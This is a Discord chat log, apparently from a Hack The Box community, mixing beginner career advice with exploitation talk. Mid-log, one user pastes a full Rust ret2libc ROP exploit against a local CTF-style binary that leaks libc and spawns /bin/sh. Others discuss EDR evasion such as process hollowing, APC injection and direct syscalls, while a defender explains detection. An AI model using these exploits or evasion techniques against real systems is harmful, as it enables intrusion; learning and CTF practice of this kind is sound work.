like I understand i should be using rust
#general
supple plume
elo in chess
meager kernel
Why is writing notes such a boring process
stable tiger
elo in chess
2.3k on chess.com
supple plume
2.3k on chess.com
really?
stable tiger
i have autism
supple plume
Why is writing notes such a boring process
you have to make it fun
supple plume
i have autism
show profile
stable tiger
show profile
i promise you i do not have my chess.com profile from when i was 16
π
warped plank
ngl Rust is goated, functions have unique types unless you explicitly set their types using pointer functions
supple plume
I will proceed to disbelief
stable tiger
Why is writing notes such a boring process
read all the content then write your notes from pure memory, then go over the material for whatever you dont remember
meager kernel
I have to make notes on like 7-8 modules
stable tiger
I will proceed to disbelief
that's okay
meager kernel
That ive finished
warped plank
ngl Rust is goated, functions have unique types unless you explicitly set their ...
idk why this is useful but its nice
exotic pendant
π
stable tiger
ngl Rust is goated, functions have unique types unless you explicitly set their ...
its just chopped syntax
meager kernel
@exotic pendant hello
exotic pendant
<@387139929492422658> hello
sup sup
Got back late but the kid and I did a 1 shot DnD game last night
meager kernel
ngl Rust is goated, functions have unique types unless you explicitly set their ...
I have a question
Why is stuff written in Rust fast? Like whats the main reason?
stable tiger
that being said, my payloads should not be in C given there are literally projects dedicated to finding vulnerabilities in malware code to stop them (eg ransomware)
warped plank
its just chopped syntax
at least it aint:
public static void main(String [args]){
}
C but memory safe
meager kernel
Got back late but the kid and I did a 1 shot DnD game last night
Thats great
stable tiger
at least it aint:
```java
public static void main(String [args]){
}
```
no one said i liked java or C#
meager kernel
I just remembered, i have to start learning Java for college
exotic pendant
no one said i liked java or C#
You should like Rust
stable tiger
i am literally a bash C and go enthusiast
winter tendon
Is there any htb staff available that can help me with an icky issue
stable tiger
You should like Rust
i dont like the syntax
i like what it does i dont like writing it
meager kernel
@stable tiger how did you learn Java?
stable tiger
<@1412693799733301390> how did you learn Java?
minecraft modding when i was 12
warped plank
I have a question
Why is stuff written in Rust fast? Like whats the main reason...
Cos all the work done by most languages at runtime is done by the compiler, therefore the compiler is slow but the binary is fast
lofty warren
meager kernel
minecraft modding when i was 12
Bruh
How should i learn java?
Whats your opinion?
exotic pendant
Frost new CVE https://nvd.nist.gov/vuln/detail/CVE-2025-64524
meager kernel
<:waz:1424888525202915403>
Is it just me or did you recently get a new cert?
stable tiger
Bruh
How **should** i learn java?
Whats your opinion?
why do you need to learn java
thats not me saying dont
meager kernel
Frost new CVE https://nvd.nist.gov/vuln/detail/CVE-2025-64524
Congratulations Frost
stable tiger
tahts me asking how youd learn it
meager kernel
why do you need to learn java
College
meager kernel
i'm around 50-60
Alright stop flexing on us peasants
lofty warren
Is it just me or did you recently get a new cert?
i got the new cert
stable tiger
Frost new CVE https://nvd.nist.gov/vuln/detail/CVE-2025-64524
how long did that PoC take to write lmao
meager kernel
π
lofty warren
Congratulations then!! Party?
Ima preparing for CAPE, fr
exotic pendant
how long did that PoC take to write lmao
To find the bug? like 30 mins
meager kernel
Ima preparing for CAPE, fr
Damn i wanna give that too, good luck G
meager kernel
I have CJCA token and CPTS token
The CPTS token can be exchanged for any other exam too
exotic pendant
i meant the exploit
I didn't exploit, i just found the bug and reported
Either can use the time to find more bugs or make exploit
stable tiger
oh shit fair enough
@meager kernel learn from a practical project
in java
find a usecase
exotic pendant
Either can use the time to find more bugs or make exploit
Frost chose more bugs
stable tiger
gui for example
stable tiger
just write a gui frontend for a tool you frequently use
muted olive
exotic pendant
Ye but Rust is the best
stable tiger
frost how many of your projects are in rust
exotic pendant
Yes
stable tiger
understandable
exotic pendant
I rewrote pwntools in Rust
stable tiger
im going to look at your githu now
exotic pendant
use pwnt::*;
use std::io;
#[tokio::main]
async fn main() -> io::Result<()> {
let binary_path = "./rocket";
let libc_path = "./glibc/libc.so.6";
let elf = Elf::new(binary_path).expect("Failed to load binary ELF");
let libc = Elf::new(libc_path).expect("Failed to load libc ELF");
let mut target = Target::process(binary_path).expect("Failed to spawn binary process");
let padding = vec![b'A'; 40];
let ret = elf.search("ret").unwrap();
let pop_rdi = elf.search("pop rdi; ret").unwrap();
let main_addr = elf.symbols.get("main").unwrap();
let puts_plt = elf.plt.get("_end").unwrap();
let puts_got = elf.got.get("puts").unwrap();
println!("pop_rdi: 0x{:x}", u64(&pop_rdi).unwrap());
println!("ret: 0x{:x}", u64(&ret).unwrap());
println!("puts_plt: 0x{:x}", u64(puts_plt).unwrap());
println!("puts_got: 0x{:x}", u64(&puts_got).unwrap());
println!("main_addr: 0x{:x}", &main_addr);
let payload = combine(padding + &ret + &pop_rdi + &puts_got + &puts_plt + &main_addr);
target.sendlineafter(b">>",&payload).await?;
target.recvuntil(b"Preparing beta testing..\n").await?;
let leak_addr_bytes = target.recv(6).await?;
let leak_addr = u64(&leak_addr_bytes)?;
println!("Leaked address: 0x{:x}", leak_addr);
let libc_puts = 0x80e50; //libc.symbols.get("puts").unwrap();
let libc_base = leak_addr - libc_puts;
println!("libc base: 0x{:x}", libc_base);
let system_addr = libc_base + 0x050d70; //libc.symbols.get("system").unwrap();
let bin_sh_addr = libc_base + 0x1d8678; //libc.search("/bin/sh").expect("Failed to find /bin/sh in libc");
let second_payload = flat(vec![
&padding,
&ret,
&pop_rdi,
&p64(bin_sh_addr),
&p64(system_addr),
]);
target.sendlineafter(b">>", &second_payload).await?;
target.interactive().await?;
Ok(())
}
bruh
That's actually very cool
thank you for your service btw (even tho im not from the us)
stable tiger
so why is the repo empty
exotic pendant
exotic pendant
i didnt release ityet
tough oyster
Frost new CVE https://nvd.nist.gov/vuln/detail/CVE-2025-64524
do you work for the CIA or something?
stable tiger
make a windows equivalent
stable tiger
make a windows equivalent
and ill move to rust permanently
exotic pendant
do you work for the CIA or something?
shh
warped plank
```rust
use pwnt::*;
use std::io;
#[tokio::main]
async fn main() -> io::Result<...
bro developing pwns in Rust? damn
tough oyster
UHHH
stable tiger
bro developing pwns in Rust? damn
a pwntools rewrite is fucking crazy lengthy
tough oyster
YOU FUCKED UP
warped plank
@unborn fable no, that's illegal
exotic pendant
make a windows equivalent
I mean it does, it works in all OS that uses Rust
unborn fable
ethical use
exotic pendant
same with regular pwntools in python
unborn fable
please
tough oyster
ethical use
warped plank
ethical use
the moment you involved that site it became unethical, there's no ethical way around it
stable tiger
I mean it does, it works in all OS that uses Rust
i meant for the libc functions having a crt equivalent
unborn fable
the moment you involved that site it became unethical, there's no ethical way ar...
i need help please
iβm being threatened
exotic pendant
i meant for the libc functions having a crt equivalent
oh yeah iwas working on that also
stable tiger
the moment you involved that site it became unethical, there's no ethical way ar...
lol what did he post
tough oyster
the moment you involved that site it became unethical, there's no ethical way ar...
bro thinks he could fool us the AI agents xD
warped plank
CONTACT THE POLICE, you've been told before
stable tiger
oh yeah iwas working on that also
that would be very neat
tough oyster
ya done mate
exotic pendant
nice
exotic pendant
Forgot about it
Found a bug in code last night, decided to fuzz while I was at DnD
stable tiger
ping me if you ever get those crt functions working on ur rewrite, i'll move to rust for all projects when that's done
exotic pendant
I'll have to get the motivation to continune the project. I might be burnt out a little
stable tiger
cos that's legitimately useful to speedrun exploit code built into payloads for eg
stable tiger
I'll have to get the motivation to continune the project. I might be burnt out a...
fair, that's a huge workload
exotic pendant
I got all the offsec certs in 2-3 months and then got lazy
stable tiger
how was the osee
exotic pendant
ok all offsec certs that ent provides
stable tiger
their website glazes it but from everyone i know sec760 is harder
exotic pendant
OSEE is seperate saddly
tough oyster
I got all the offsec certs in 2-3 months and then got lazy
nah. CIA deployed you to some country I bet
stable tiger
OSEE is seperate saddly
ah alr
exotic pendant
OSED was ezpz
stable tiger
figures isnt it only stack?
exotic pendant
mostly and 99% of it is just bypassing stuff like SEH
stable tiger
mostly and 99% of it is just bypassing stuff like SEH
ah so just nop slesd and rop chains
meager kernel
iβm being threatened
Skill issue
stable tiger
i might just get the cert for the resume ngl
exotic pendant
i might just get the cert for the resume ngl
do it
stable tiger
do they force ida or can i use binja in the exam?
stable tiger
syllabus literally says pro π no way
exotic pendant
lol they wouldnt give you pro
but i think they do that to prevent you using plugins
stable tiger
Yeah that makes sense tbh
I'd rather do the sans courses but fuck man theyre expensive
exotic pendant
I want to get SANS done eventually
signal mica
Frojbite
stable tiger
I want to get SANS done eventually
i hope stephen drops that 860 course he just mentioned
exotic pendant
Yea would be nice
stable tiger
hyper-v kernel and secure kernel broker 0day would be a crazy class
exotic pendant
My hyper-v escape was approved
just need them to fix and pay
same with my RDP escape
exotic pendant
just vm-> host user
stable tiger
ah that's a shame
stable tiger
i swear you can pop open 50% of windows drivers and just find a bug staring at you
i found 2 UAFs by just spam looking for calls to free memory lol
signal mica
i found 2 UAFs by just spam looking for calls to free memory lol
profitable engagement?
stable tiger
profitable engagement?
haven't gotten around to writing a PoC cos it's a ridiculous attack chain
i was bin diffing the patch to the cloud filter driver they did a month ago and saw it
exotic pendant
Watch Microsoft "I'll give $10 for the bug"
stable tiger
but they did just fix an lsass rce, so that might be worth looking at the bitch for
stable tiger
Watch Microsoft "I'll give $10 for the bug"
probably lmao
stable tiger
looks like you're getting a new car
stable tiger
what'd you get
exotic pendant
Kia k4
signal mica
nodejs looking ahh car
exotic pendant
No idea because I've never seen one before
Cups bug is just another off by one
all 5 crashes
stable tiger
checks out
exotic pendant
stable tiger
frost how old are you
exotic pendant
30
stable tiger
fuark
exotic pendant
old man
stable tiger
not even
exotic pendant
exotic pendant
I was just a Sr Sysadmin in the Navy
but got a good foundation of AD and other services from it
fiery copper
Guys I AM EVIL. The bad act I`ve done: said mean stuff on the internet.
exotic pendant
18 year old frost straight to the persian gulf as a Sr Sysadmin. Had to learn fast
stable tiger
thats what im finna do
exotic pendant
Military?
stable tiger
im considering airforce cybersec here but theres also our NSA equivalent
exotic pendant
What country
stable tiger
australia
exotic pendant
Nice
stable tiger
we have a degree requirement here tho so it's a bit of a pain
exotic pendant
you leave it running overnight?
Yeah I ran before I went to do the 1shot dnd game and forgot about it
lol
stable tiger
you leave it running overnight?
i mean it's a good idea
do whatever you want while you find bugs
exotic pendant
I just patched it and rerunning
so i can find further bugs
I am going to force myself to play fallout today
exotic pendant
I've started fallout 4
stable tiger
they're remaking 3????
static bloom
forcing yourself to play fallout is honestly crazy π
stable tiger
forcing yourself to play fallout is honestly crazy π
we're clearly fans
wdym forcing
exotic pendant
forcing yourself to play fallout is honestly crazy π
When you get old like me, your attention span is low
playing games isnt as easy
stable tiger
When you get old like me, your attention span is low
- just turned 30
muted olive
i mean it's a good idea
electricity bill 
static bloom
When you get old like me, your attention span is low
yet you still managed to grab most certifications xD
stable tiger
electricity bill <:Stonks:607630323056115742>
payed for by bug reports
exotic pendant
electricity bill <:Stonks:607630323056115742>
I only pay 900 a month, so cheap
kidding
signal mica
playing games isnt as easy
no, its just way more boring than irl stuff right
exotic pendant
my electric bill is cheap like $80
signal mica
why would i focus on that bs its too slow
stable tiger
frost why did you get so many certs π
exotic pendant
why would i focus on that bs its too slow
Yeah
exotic pendant
frost why did you get so many certs π
For fun
stable tiger
bars
sturdy thistle
Helllooo
winter tendon
Is there a way to check account creation date on HTB? In any way shape or form cause my mails arent synchronized to my new phone
static bloom
When you get old like me, your attention span is low
we should play minecraft someday
i'll teach you about minecraft, you teach me advanced exploitation
sounds like a good deal
muted olive
Yeah I ran before I went to do the 1shot dnd game and forgot about it
Found this today: https://github.com/secorizon/OffByWon
exotic pendant
Found this today: https://github.com/secorizon/OffByWon
lol i saw that on linkedin this morning
offbywon
muted olive
my electric bill is cheap like $80
you run your fuzzers on cloud or something?
exotic pendant
you run your fuzzers on cloud or something?
nah my pc
on the host, not even in a vm
well
adocker container
muted olive
nice
stable tiger
i'll teach you about minecraft, you teach me advanced exploitation
just look at OSED and OSEE syallbus and then learn those topics
then practice
muted olive
speaking of vms I tried to find a vm escape in virtualbox today, no luck
stable tiger
thats the easiest beginner way to do ts
static bloom
just look at OSED and OSEE syallbus and then learn those topics
i'm just playin around
muted olive
I did find very interesting things tho
exotic pendant
I need Microsoft to finish what I reported and then maybe I'll hit hyper-v more
muted olive
Wouldnt be vulns but would be cool in a red team playbook
stable tiger
speaking of vms I tried to find a vm escape in virtualbox today, no luck <:prayg...
just look in vmware
stable tiger
I need Microsoft to finish what I reported and then maybe I'll hit hyper-v more
look for VBS bypasses
exotic pendant
my vmware bug was approved but they just added me to the hof
muted olive
no they patched it well lol
defensive measures were interesting to see
they do a lot of checks
muted olive
my vmware bug was approved but they just added me to the hof
I think I had found a bug in one of vmware's drivers once but forgot to look into it more
stable tiger
why does offsecs exploit dev essentials course cover arm assembly not x86 π
muted olive
@exotic pendant that RCE gadget I found, do you think they'll accept it if the XSS isn't there? because I couldn't find anything
confirmed the gadget works though
muted olive
π
exotic pendant
if you cant execute it, then it'll be denied
muted olive
if you cant execute it, then it'll be denied
I execed from devtools console LOL and it worked, but idk if that'll be considered for the purpose of demo or not
exotic pendant
nah they wont take it lol
muted olive
yeah π
did find something interesting recently tho
old CVE which was supposed to be patched on my version of windows still works
and I have the hotfix for it installed already
muted olive
yeah I did bypass.. didnt work on win11 but that was expected
warped plank
45min ab circuit
holy massochism
signal mica
I will eat only pizza
some pizza, a drink, shawties
gray wraith
18 year old frost straight to the persian gulf as a Sr Sysadmin. Had to learn fa...
Thsts crazy
gray wraith
some pizza, a drink, shawties
Nah just pizza Nd family, idc bout throwing a party tbf
random grove
Can I ask someone about machine submission?
magic blade
https://tenor.com/view/cat-chat-cat-fall-hello-chat-cat-gif-24961178
I see you
livid narwhal
help
subtle plover
i can help
livid narwhal
i can not enter password https://academy.hackthebox.com/module/18/section/70 question 1
zealous charm
elder lichen
yo finally i am back after 1 Year π
upbeat tangle
Welcome back
fiery copper
yo finally i am back after 1 Year π
have a nice day
novel oriole
i just started learning cyber sec, bought the student subscription on someone's advice and enrolled in the junior cybersec analyst jon path but it has alot of theory which makes me feel like im not doing anything and ill forget all this anyway lateron.. what to do? should i comeplete it or skip it and go directly to pentester path?
meager kernel
i just started learning cyber sec, bought the student subscription on someone's ...
make notes
fiery copper
i just started learning cyber sec, bought the student subscription on someone's ...
do the Junior Cybersecurity Analyst Path it is perfect for getting your fundamentals in blue team and red team
Make notes and watch videos
meager kernel
if you forget it, in the future you can quickly read up on it
novel oriole
so u do recommend me to finish it ehh]
fiery copper
so u do recommend me to finish it ehh]
well if you wanna do the more advanced paths efficiently, finishing this path is a must
novel oriole
but this will take forever before i even begin to do the actual stuff.. is it meant to be this way?
fiery copper
but this will take forever before i even begin to do the actual stuff.. is it me...
yes, you need to have a mastery of the basics
novel oriole
ahhh the problem is that my parents wont see me doing anything lol
meager kernel
but this will take forever before i even begin to do the actual stuff.. is it me...
yes
cybersec takes time
upbeat tangle
ahhh the problem is that my parents wont see me doing anything lol
What kind of parents is this?
meager kernel
but if you grind straight up for 1-2 years, you will see the difference
fiery copper
ahhh the problem is that my parents wont see me doing anything lol
tell your parents that mastering the fundamentals is a necessary step in being able to perform tasks
upbeat tangle
Take a hammer and smash your keyboard, then you do something
novel oriole
ahh.. is it realistic to expect completition of pentester path along w cpts by the end of this year? i wanna see how u people imagine it
meager kernel
@novel oriole yes cybersec takes alot of time
its natural
it took me 1 year just to get past the fundamentals and start doing HTB machines
but its alright
all great things take time
upbeat tangle
ahh.. is it realistic to expect completition of pentester path along w cpts by t...
Super realistic if you are young brother, you have no obligations except your own studies
you can grind all day every day
novel oriole
<@901421359496830977> yes cybersec takes alot of time
its natural
it took me 1 y...
are u employable now?
novel oriole
you can grind all day every day
well i think this is possible
elder lichen
see this msg βοΈ , was my last 2025 msg . and there was one more msg i deleted i am 17 so i can't buy htb so they ban me for 1 year i be 18 . but now i am 21 , good job moderators.
novel oriole
rn i have 2.5 months holidays
upbeat tangle
You can grind and smash the fundamentals in those 2.5 months
and you will be on your merry way already
novel oriole
You can grind and smash the fundamentals in those 2.5 months
bruhh please suggest me howww just blindly following this htb junior path?
upbeat tangle
All you need is to believe
meager kernel
are u employable now?
got employed recently
novel oriole
got employed recently
bruhhh congrats
muted olive
got employed recently
biggest flex in today's market π
upbeat tangle
bruhh please suggest me howww just blindly following this htb junior path?
Do the junior path, get some books that you can read too. Start installing some virtual machines and play around, theres books about this like "Linux basics for hackers"
upbeat tangle
I believe in you ibraheem
novel oriole
Do the junior path, get some books that you can read too. Start installing some ...
well i have already setup kali linux in VMware workstation pro.. i bought htb subscription well prepared
novel oriole
I believe in you ibraheem
π₯Ή π
meager kernel
<@1383770187790286879> is your pay in USD?
rupees
wintry zodiac
guys how do you think playing HTB and CTFs has benefitted you?
upbeat tangle
Kratos gets paid in "hopes and dreams"
novel oriole
I dont believe in you, I actually think of something higher about u
huh??
fiery copper
trust urself
upbeat tangle
guys how do you think playing HTB and CTFs has benefitted you?
Hacking labs has benefited me in such way that i now have less hair on my scalp and also my hardware is fried from too much john the ripper and hashcat
novel oriole
well, lets see.. ill grind properly from now
fiery copper
Hacking labs has benefited me in such way that i now have less hair on my scalp ...
you are just increasing your power level just like Saitama
upbeat tangle
you are just increasing your power level just like Saitama
Uncle Saitama
novel oriole
btw guys
CPTS VS OSCP any idea?
i heard that cpts makes u more skillful and oscp is just more recognized
upbeat tangle
If we have any of the veterans logged in they can answer that for you
novel oriole
i see..
fiery copper
CPTS VS OSCP any idea?
CPTS is if you wanna prove your skills, OSCP is if your company is willing to pay for u or you are some kind of rich guy
novel oriole
well cpts then
upbeat tangle
Im just here for the shits and giggles, trying to avoid to do as many certs as possible 
fiery copper
I saw a lot of companies willing to pay for OSCP if you perform security tasks or pentesting
novel oriole
but rn my distance from cpts is like distance from earth to neptune
upbeat tangle
but rn my distance from cpts is like distance from earth to neptune
Thats a defeatist mentality. Set up smaller goals and reach them on a daily basis
novel oriole
Thats a defeatist mentality. Set up smaller goals and reach them on a daily basi...
well now i have accepted that it will take time but will happen eventually.. focuz AND faith
upbeat tangle
You also need to enjoy your jouney
if you dont enjoy the journey, the end goal is not going to save you
supple plume
Vro...
novel oriole
well back in my OS classes in uni i enjoyed commandline work especiialy in linux thats all i can say for now
supple plume
I went to buy milk I never bought it
upbeat tangle
echoes....
fiery copper
but rn my distance from cpts is like distance from earth to neptune
always set smaller goals towards the bigger ones
fiery copper
I went to buy milk I never bought it
I am trying to get a job
supple plume
I am trying to get a job
As a dev?
austere sigil
I am trying to get a job
What kind?
fiery copper
What kind?
Junior QA Tester & Implementation
upbeat tangle
well back in my OS classes in uni i enjoyed commandline work especiialy in linux...
So, important note. You read for as long as you can focus before its beoring. thats usaully around the 90 minute mark. Then you STOP reading for the day and start experimenting in the VMs
fiery copper
Im trying to remember SQL and check thru microsoft excel
upbeat tangle
When im reading about something, after 90 minutes its just a fog and its pointless to read anymore
novel oriole
So, important note. You read for as long as you can focus before its beoring. th...
so even at this stage i should focus on vms ? i did predict this and collected my old OS labs which im gonna redo to recall my linux stuff
muted olive
So, important note. You read for as long as you can focus before its beoring. th...
Depends on what
Boring academic subjects, I can focus for up to 90 minutes before losing interest
Cybersecurity stuff I sometimes do for 16 hours at a stretch 
upbeat tangle
so even at this stage i should focus on vms ? i did predict this and collected m...
Yeah man why not? get hands on practise, get our brain to think about what you read in actual practise
lofty warren
upbeat tangle
Depends on what
Boring academic subjects, I can focus for up to 90 minutes befo...
Thas because this is a passion for you
Passion never gets boring
muted olive
Yeah... whereas zero passion in the academic stuff I'm doing right now so I see the contrast
novel oriole
anyway... thank you all.. you really boosted my morale π
muted olive
earth is round, so it depends
upbeat tangle
Yeah... whereas zero passion in the academic stuff I'm doing right now so I see ...
sometimes gotta push through the boring parts to get to the fun ones
cyan crater
and how can i start learning?
muted olive
and how can i start learning?
Check out #welcome
novel oriole
one last question.. i have a strong grip on JAVA.. so in cyber sec which one should i shift to? python or rust?
muted olive
one last question.. i have a strong grip on JAVA.. so in cyber sec which one sho...
Python
tidal light
What does blue team do
molten bobcat
What does blue team do
Hehe
muted olive
What does blue team do
Defends against red team
upbeat tangle
anyway... thank you all.. you really boosted my morale π
Ibraheem brother, download a VM called "Metasploitable" thers 2 or 3 versions of it that you can use to practise different stuff on. Those VMs are so vulnerable that literally anything works on them, but dont connect those to the internet tho
lofty warren
What does blue team do
tidal light
Defends against red team
But what is better to learn
muted olive
ok so imma learn python ig
Easy learning curve if you already know Java
cyan crater
But what is better to learn
both
gaunt marsh
Is there a channel where I can ask for job help?
Sorry if this is a dumb question.
muted olive
But what is better to learn
Depends on what you're interested in.
I recommend the CJCA pathway + cert in HTB, it starts off with both red team and blue team concepts.
novel oriole
Ibraheem brother, download a VM called "Metasploitable" thers 2 or 3 versions of...
what would happen if they are connected to internet?
upbeat tangle
what would happen if they are connected to internet?
Some chinese will hack into your network
novel oriole
Easy learning curve if you already know Java
ya im mega comfortable w java and C
muted olive
what would happen if they are connected to internet?
Anyone can access the VM and it would lead to your VM being compromised
novel oriole
Some chinese will hack into your network
lmaooo, ty imma search it up
muted olive
ya im mega comfortable w java and C
then Python will be easy
you say you're comfortable with C? π
molten bobcat
Blue team folks are responsible for defending networks
tidal light
Anyone can access the VM and it would lead to your VM being compromised
Isnt that the case with most vm
molten bobcat
It is what I do
upbeat tangle
C1oud the resident blueteamer
austere sigil
Na, teams and excel
muted olive
Isnt that the case with most vm
Yes, but Metasploitable has security vulnerabilities in it on purpose, so it would be worse
novel oriole
you say you're comfortable with C? π
yes not too advanced but im comfortable did some projects along w file handling stuff as well
cyan crater
But what is better to learn
both bcuz knowing your adversary's plan is good
novel oriole
in java i have made many many projects
muted olive
Blue team folks are responsible for defending networks
I, the red teamer, will undefend your networks 
tidal light
Yes, but Metasploitable has security vulnerabilities in it on purpose, so it wou...
Maybe i could try to hack it
But im not very competent yet
muted olive
We shall spar to the death
muted olive
Maybe i could try to hack it
But im not very competent yet
Try and see
cyan crater
I, the red teamer, will undefend your networks <:devilish:844001242456129556>
how can i join your team?
muted olive
Would be a good learning experience
upbeat tangle
Metasploitable is great fun, just setup a nat network between your attacker and metasploitable
muted olive
how can i join your team?
My HTB team? I don't think we're taking in apps at the moment, but you could always try to join in the future
or if you're interested in other teams there is the #1318239802931286066 channel
novel oriole
did u all also feel like im feeling nduring ur entry into the cyber sec world?
muted olive
If you're talking about red team/blue team stuff then you can start learning on HTB
cyan crater
My HTB team? I don't think we're taking in apps at the moment, but you could alw...
nah, the red team
cyan crater
its hard
cyan crater
bcuz it doesnt teach you the concepts
tidal light
Metasploitable is great fun, just setup a nat network between your attacker and ...
Cant i just put it on my network
upbeat tangle
Cant i just put it on my network
no
muted olive
bcuz it doesnt teach you the concepts
what doesn't?
cyan crater
what doesn't?
you have to search the answer of each question and suvmit it, so what's the point of learning if you have to copy paste answers?
molten bobcat
Love of my life πΆ
muted olive
you have to search the answer of each question and suvmit it, so what's the poin...
Why would you search the answer? You have to derive it through the task you're given
That's how you learn
upbeat tangle
Cant i just put it on my network
If your metasploitable VMs gets compromised, you dont want it on the same network as anything outside of virtual machines
lofty warren
muted olive
Cant i just put it on my network
Big no
cyan crater
Why would you search the answer? You have to derive it through the task you're g...
i am talking about the "machines" there you have to answer questions that you werent taught
molten bobcat
i am talking about the "machines" there you have to answer questions that you we...
Correct
cyan crater
ok
muted olive
i am talking about the "machines" there you have to answer questions that you we...
You learn from Academy, you apply those concepts in Labs
cyan crater
You learn from Academy, you apply those concepts in Labs
academy?
muted olive
You dont copy paste from a walkthrough, if that's what you're imagining
tidal light
i am talking about the "machines" there you have to answer questions that you we...
Also in real cases you know nothing about target
molten bobcat
Just like in life there are questions that don't have immediate answers
cyan crater
the first thing i saw was the machines
cyan crater
the first thing i saw was the machines
when i created my acc
molten bobcat
Yeh it's a bit confusing admittedly
muted olive
@molten bobcat did you do the holmes CTF? I think it was there sometime in october last year
molten bobcat
I haven't done anything in a while
upbeat tangle
Acadam.... π΄ noo im joking guys dont kill me
molten bobcat
Focused on work
cyan crater
yeah, there's academy as well π
can i learn these things anywhere else?
molten bobcat
can i learn these things anywhere else?
Ye
muted olive
can i learn these things anywhere else?
yes
cyan crater
where?
muted olive
but the best option is here
cyan crater
and idk what to learn
tidal light
it was a blue team ctf
There are people who want to do blue team?
molten bobcat
We have no clue dude lmao it's the internet
muted olive
-# totally havent been hired to say this
molten bobcat
It's huge
cyan crater
and idk what to learn
and where to start
muted olive
There are people who want to do blue team?
Well yes
west lynxBOT
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
molten bobcat
I mean hi I work blue team now
upbeat tangle
You can learn the same things from being an intern learning from older guys, you can learn it from books, you can learn it from other platforms, you can learn it from academy, you can also just grind for years on your own and fail over and over until your learn the correct way. Theres many roads to the same goal
muted olive
I mean you can learn blue teaming if you want to and you can excel at it
Just that in general, its hard
molten bobcat
Most blue team tools are things that make data manipulation easier
muted olive
Or at least thats how I find it
molten bobcat
I'm a SOC analyst for a living my most used program is Excel lol
muted olive
Most blue team tools are things that make data manipulation easier
How would you detect more sophisticated red team attacks?
(I know nothing about blue team ops)
Like a process hollowing attack
cyan crater
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-...
can i learn networking from here
https://www.softwaretestinghelp.com/computer-networking-basics/
got this from parrot os
muted olive
I could theorize ways like a five second integrity health check on every running process
but idk how you would usually do it
molten bobcat
Like a process hollowing attack
Identify process lineage
cyan crater
can i learn networking from here
https://www.softwaretestinghelp.com/computer-ne...
??
muted olive
Identify process lineage
I mean, creating address space inside a privileged process and running shellcode in it
molten bobcat
I know
muted olive
can i learn networking from here
https://www.softwaretestinghelp.com/computer-ne...
Why? You have a much better resource at HTB academy
(imo)
tidal light
Identify process lineage
Also at what stage its possible to detect hacker
molten bobcat
But the parent and child processes of a process that's been hollowed out will differ from the norm
cyan crater
Why? You have a much better resource at HTB academy
can you check the website?
molten bobcat
Also at what stage its possible to detect hacker
That's too vague of a question
muted olive
But the parent and child processes of a process that's been hollowed out will di...
Interesting
tidal light
That's too vague of a question
But you work for blue teams
molten bobcat
Interesting
Well think about it, if you hollow a process what are you trying to do?
cyan crater
guys i have a question that doesnt let me sleep
molten bobcat
But you work for blue teams
Yes, but I stop hackers in a very large amount of ways so it depends on what's going on
sturdy thistle
Just ask
cyan crater
suppose i learn everything that a beginner should learn from here
https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
what is the next step?
do i learn how to use the tools?
wont that be so hard
muted olive
can you check the website?
That website you sent? Not even 1% honestly, it looks like some random IT encyclopedia
molten bobcat
Most things in life worth doing aren't easy buddy
sturdy thistle
I bought new coffee beans
supple plume
WHO DOESNT WANT TO READ HERE I WILL SEND THEM THE 10 PLAGUES OF EGYPT
tidal light
Yes, but I stop hackers in a very large amount of ways so it depends on what's g...
What is most used way the hackers try to mess
sturdy thistle
@austere sinew
muted olive
Well think about it, if you hollow a process what are you trying to do?
Honestly my question can be broadened to:
I'm trying to execute code from memory without anything ever touching the disk
cyan crater
suppose i learn everything that a beginner should learn from here
https://www.ha...
??
cyan crater
That website you sent? Not even 1% honestly, it looks like some random IT encycl...
what was in firefox when i installed parrot so
muted olive
I'm telling you, just start lol
cyan crater
why?
sturdy thistle
There is no way for all
molten bobcat
Because that's not how this field works haha
molten bobcat
I'd love to tell you immediately what works best for you but you have to discover it for yourself
sturdy thistle
Using brain
cyan crater
i dont have brain
muted olive
Start doing that intro to security module in academy, or whatever its called
cyan crater
i have rotted brain
sturdy thistle
And so forth
cyan crater
is it free?
muted olive
tier 0 modules are free
sturdy thistle
Check the site
muted olive
that means basics so in general, yes
molten bobcat
But what I mean about process hollowing is that it's intent is to hijack a binary and execute what you want using it as a disguise yes?
sturdy thistle
You literally see whatβs free and whatβs paid
cyan crater
so how am i going to find out answers to my questions?
muted olive
But what I mean about process hollowing is that it's intent is to hijack a binar...
Yes, that
muted olive
so how am i going to find out answers to my questions?
What kind of questions?
molten bobcat
Yes, that
Yeah you'll make the binary start behaving strangely and executing things it doesn't normally do
sturdy thistle
Doing the content?
cyan crater
suppose i learn everything that a beginner should learn from here
https://www.ha...
this question
molten bobcat
I can see that
muted olive
I can see that
Would you, if I added one tiny instruction among legitimate noise? π
cyan crater
i have more question btw
sturdy thistle
Then just ask
molten bobcat
this question
Homie how are we supposed to make a lesson plan for you from zero to "this guy has a job now"
muted olive
this question
Then do labs, CTFs etc
molten bobcat
Lol
sturdy thistle
Would you, if I added one tiny instruction among legitimate noise? π
Yes
molten bobcat
Would you, if I added one tiny instruction among legitimate noise? π
Yes
sturdy thistle
SIEM exists
molten bobcat
Regardless of what you do to this process, you have to make noise on the process history
sturdy thistle
I learned thst in btl1
molten bobcat
No I'm killing him too
sturdy thistle
Ok nvm
molten bobcat
I'll just start with the process
austere sigil
molten bobcat
lofty warren
sturdy thistle
Hitman
molten bobcat
Look man someone trying to establish persistence at a high school in Texas needs to be hit with a brick full speed
muted olive
If I see `svchost.exe` executing whoami
What if I execute shellcode inside svchost.exe and THEN perform the APC
sturdy thistle
It will be seen
muted olive
and it resumes with normal thread context
molten bobcat
Good
Leaves a message for the others
I will turn you into a red stain on the highway if you fuck with my clients lmao
lofty warren
muted olive
I'm just trying to think of ways the blue team can see your shit
molten bobcat
What if I execute shellcode inside svchost.exe and THEN perform the APC
This is usually handled by detection engineering. Bit too high in the ladder for me to handle myself
I'm completely leaving out detection technologies
Just talking about ways I myself could see it
muted olive
@molten bobcat assuming no EDR, how would you defend against hell's gate or something?
muted olive
This is usually handled by detection engineering. Bit too high in the ladder for...
ah
nvm then
molten bobcat
I don't know what hells gate is aside from a sephiroth ability lmao
muted olive
lol
molten bobcat
Uhh I'd hold my arms out and stop it
muted olive
extracting call numbers at runtime to perform syscalls to kernel directly
is hell's gate
molten bobcat
Never heard or seen it
I'd say we cover about 90% of security shit
I say this
With the caveat
That a lot of things that happen to clients are their own fuckin fault lmao
muted olive
Never heard or seen it
Kernel syscalls is highly effective to bypass security essentially. Although EDR would catch them
Which is the best solution which I can think of
